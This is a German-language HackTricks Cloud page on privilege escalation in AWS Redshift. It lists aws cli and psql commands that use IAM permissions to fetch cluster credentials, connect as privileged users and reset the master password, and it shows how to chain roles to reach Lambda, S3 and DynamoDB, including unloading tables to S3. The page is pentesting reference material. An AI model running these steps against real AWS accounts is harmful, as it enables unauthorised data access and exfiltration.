German - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - Redshift Privesc

Unterstützen Sie HackTricks

Redshift

Für weitere Informationen zu RDS überprüfen Sie:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

Mit diesen Berechtigungen können Sie Informationen über alle Cluster (einschließlich Name und Cluster-Benutzername) abrufen und Zugangsdaten erhalten, um darauf zuzugreifen:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Potenzielle Auswirkungen: Sensible Informationen in den Datenbanken finden.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

Mit diesen Berechtigungen können Sie Informationen über alle Cluster abrufen und Zugangsdaten dafür erhalten. Beachten Sie, dass der postgres-Benutzer die Berechtigungen hat, die die IAM-Identität hat, die verwendet wurde, um die Zugangsdaten zu erhalten.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Potenzielle Auswirkungen: Sensible Informationen in den Datenbanken finden.

redshift:DescribeClusters, redshift:ModifyCluster?

Es ist möglich, das Master-Passwort des internen postgres (redshift) Benutzers über die aws cli zu ändern (ich denke, das sind die Berechtigungen, die du benötigst, aber ich habe sie noch nicht getestet):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Potenzielle Auswirkungen: Finde sensible Informationen in den Datenbanken.

Zugriff auf externe Dienste

Um auf alle folgenden Ressourcen zuzugreifen, müssen Sie die zu verwendende Rolle angeben. Ein Redshift-Cluster kann eine Liste von AWS-Rollen zugewiesen haben, die Sie verwenden können, wenn Sie die ARN kennen, oder Sie können einfach "default" setzen, um die standardmäßig zugewiesene zu verwenden.

Darüber hinaus erlaubt Redshift, wie hier erklärt, auch das Verketten von Rollen (solange die erste die zweite annehmen kann), um weiteren Zugriff zu erhalten, indem Sie sie einfach mit einem Komma trennen: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Wie in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html erklärt, ist es möglich, eine Lambda-Funktion von Redshift aus aufzurufen mit etwas wie:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Wie in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html erklärt, ist es möglich, in S3-Buckets zu lesen und zu schreiben:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Wie in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html erklärt, ist es möglich, Daten von dynamodb zu erhalten:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

Die Amazon DynamoDB-Tabelle, die die Daten bereitstellt, muss in derselben AWS-Region wie Ihr Cluster erstellt werden, es sei denn, Sie verwenden die REGION Option, um die AWS-Region anzugeben, in der sich die Amazon DynamoDB-Tabelle befindet.

EMR

Überprüfen Sie https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html

References

Support HackTricks
PreviousAWS - RDS PrivescNextAWS - Route53 Privesc

Last updated